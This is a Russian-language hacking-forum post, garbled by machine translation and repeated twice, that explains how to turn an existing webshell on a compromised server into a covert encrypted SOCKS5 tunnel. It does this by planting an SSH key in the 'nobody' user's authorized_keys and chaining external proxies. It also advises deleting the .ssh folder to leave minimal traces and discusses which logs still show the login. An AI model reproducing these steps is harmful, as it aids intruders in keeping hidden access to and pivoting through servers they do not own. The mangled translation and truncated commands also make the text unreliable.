- Регистрация
- 08.03.17
- Сообщения
- 15
- Реакции
- 11
- Репутация
- 15
На эту тему можно найти в Google. Для решения практических задач, мы не заинтересованы, так как
1) требует минимума Ruta для настройки чана устройства
2) отключено по умолчанию
3) значительно
4) не является необходимым, для некоторых очень специфических задач , за исключением.
Выполнение VPN, я имею в виду , что мы получаем прокси - зашифрованный туннель - именно то , что вы хотите от «реальной» VPN для нашей задачи (прямой - в отличие от обратного прокси - сервера до и после того, как Webshell может и должен быть использован.).
Итак, у нас есть общий Webshell. Путь к консоли мы блокируем две проблемы:
наш пользователь (никто) пароль не установлен. В т.д. / тень сказал что - то , как никто: *: 14069: 0: 99999: 7 :::
или никто: !!: 14069: 0: 99999: 7 :::. Для изменения пароля необходимо указать старый пароль, изменение пароля в результате не представляется возможным.
наш указанный пользователь оболочка / SBIN / NOLOGIN или его аналог, и все современные юниксов требуют пароля , чтобы изменить оболочку.
Первая проблема , которую мы не использовать открытый ключ аутентификации, а второй не является проблемой на всех, потому что для туннеля оболочки не требуется.
Зависимости:
/ и т.д. / SSH / sshd_config с настройками по умолчанию, как указано ниже:
параметр не указан AllowUsers в / и т.д. / SSH / sshd_conf (по умолчанию в конфигурационном файле нет)
AllowTcpForwarding да или закомментировать ( по умолчанию отключен)
RSAAuthentication да или закомментировать ( по умолчанию отключено)
PubkeyAuthentication да или закомментировать ( по умолчанию отключено)
AuthorizedKeysFile в домашней папке ( по умолчанию закомментировано и .ssh / authorized_keys)
доступ к домашней директории написать
на некоторых хостах домов каталог только для чтения, и вы можете писать только в public_html. Эти хосты не подходят.
$ Местная команда
$ Command на удаленном хосте
Создать в паре секретных / открытых ключей:
$ Ssh-кейген -t RSA
Возьмите файл id_rsa.pub и заполнить его в ~ / .ssh / переименован в authorized_keys
Наклейте правильные разрешения
$ Chmod 755 ~ / .ssh
$ Chmod гоу-rwXx ~ / .ssh / authorized_keys
Connect и получить soks5 хост порт 31337
$ Ssh
или ... использовать дополнительные Socks5 после vebshella - «Внешний Socks5 "в картине
$ Ssh
носки ... или использовать как до , так и после vebshella:
$ Ssh
ссылка на connect.c.
Прокси ... до и после того, как vebshella, альтернатива, при поддержке цепочек:
$ Proxychains SSH
ссылка proxychains, прокси определен в конфигурации
Вы можете использовать пара ключей от внешних носителей - это указывает путь к секретному ключу в параметре
-i / мнт / secure_fs / id_rsa
После того как туннель розы, вы можете удалить .ssh папку, если вы не планируете использовать туннель на регулярной основе. Таким образом , вы оставить наименьший след.
В процессе будет следующий код:
корень 13768 0,0 2,1 10052 2804? Сс 16:32 0:00 не SSHd: никто [собств]
никто 13774 0,0 1,0 10052 1408? S 16:32 0:00 SSHD: никто ,
кто и последнее подключение не отображается
Plus:
+ минимальное значение - залили ключ, поднятый туннель используется, бросил.
+ Скромные процессы присутствия , чтобы изменить внешние и внутренние носки не должны иметь доступ к vebshellu - перезапуск туннеля на месте.
Нет + нет открытых портов , если вы используете прокси - сервер для WebShell не знает , кто ты. Вы можете организовать туннель , даже если Safe_mode = ON
Минус:
- в /.var / Журнал / СОТ остается то , что пользователь никто Войти с такой и такой адрес.
Иногда нет записи доступа к домашней директории.
1) требует минимума Ruta для настройки чана устройства
2) отключено по умолчанию
3) значительно
4) не является необходимым, для некоторых очень специфических задач , за исключением.
Выполнение VPN, я имею в виду , что мы получаем прокси - зашифрованный туннель - именно то , что вы хотите от «реальной» VPN для нашей задачи (прямой - в отличие от обратного прокси - сервера до и после того, как Webshell может и должен быть использован.).
Итак, у нас есть общий Webshell. Путь к консоли мы блокируем две проблемы:
наш пользователь (никто) пароль не установлен. В т.д. / тень сказал что - то , как никто: *: 14069: 0: 99999: 7 :::
или никто: !!: 14069: 0: 99999: 7 :::. Для изменения пароля необходимо указать старый пароль, изменение пароля в результате не представляется возможным.
наш указанный пользователь оболочка / SBIN / NOLOGIN или его аналог, и все современные юниксов требуют пароля , чтобы изменить оболочку.
Первая проблема , которую мы не использовать открытый ключ аутентификации, а второй не является проблемой на всех, потому что для туннеля оболочки не требуется.
Зависимости:
/ и т.д. / SSH / sshd_config с настройками по умолчанию, как указано ниже:
параметр не указан AllowUsers в / и т.д. / SSH / sshd_conf (по умолчанию в конфигурационном файле нет)
AllowTcpForwarding да или закомментировать ( по умолчанию отключен)
RSAAuthentication да или закомментировать ( по умолчанию отключено)
PubkeyAuthentication да или закомментировать ( по умолчанию отключено)
AuthorizedKeysFile в домашней папке ( по умолчанию закомментировано и .ssh / authorized_keys)
доступ к домашней директории написать
на некоторых хостах домов каталог только для чтения, и вы можете писать только в public_html. Эти хосты не подходят.
$ Местная команда
$ Command на удаленном хосте
Создать в паре секретных / открытых ключей:
$ Ssh-кейген -t RSA
Возьмите файл id_rsa.pub и заполнить его в ~ / .ssh / переименован в authorized_keys
Наклейте правильные разрешения
$ Chmod 755 ~ / .ssh
$ Chmod гоу-rwXx ~ / .ssh / authorized_keys
Connect и получить soks5 хост порт 31337
$ Ssh
You must be registered for see links
-D 31337 -N или ... использовать дополнительные Socks5 после vebshella - «Внешний Socks5 "в картине
$ Ssh
You must be registered for see links
-L 31337: externalsocks.com: 1080 -N носки ... или использовать как до , так и после vebshella:
$ Ssh
You must be registered for see links
-L 31337: externalsocks.com: 1080 -N -o ProxyCommand = "подключить -S internalsocks.net:1080% ч% р" ссылка на connect.c.
Прокси ... до и после того, как vebshella, альтернатива, при поддержке цепочек:
$ Proxychains SSH
You must be registered for see links
-L 31337: externalsocks.com: 1080 -N ссылка proxychains, прокси определен в конфигурации
Вы можете использовать пара ключей от внешних носителей - это указывает путь к секретному ключу в параметре
-i / мнт / secure_fs / id_rsa
После того как туннель розы, вы можете удалить .ssh папку, если вы не планируете использовать туннель на регулярной основе. Таким образом , вы оставить наименьший след.
В процессе будет следующий код:
корень 13768 0,0 2,1 10052 2804? Сс 16:32 0:00 не SSHd: никто [собств]
никто 13774 0,0 1,0 10052 1408? S 16:32 0:00 SSHD: никто ,
кто и последнее подключение не отображается
Plus:
+ минимальное значение - залили ключ, поднятый туннель используется, бросил.
+ Скромные процессы присутствия , чтобы изменить внешние и внутренние носки не должны иметь доступ к vebshellu - перезапуск туннеля на месте.
Нет + нет открытых портов , если вы используете прокси - сервер для WebShell не знает , кто ты. Вы можете организовать туннель , даже если Safe_mode = ON
Минус:
- в /.var / Журнал / СОТ остается то , что пользователь никто Войти с такой и такой адрес.
Иногда нет записи доступа к домашней директории.
Последнее редактирование модератором:
Поделиться: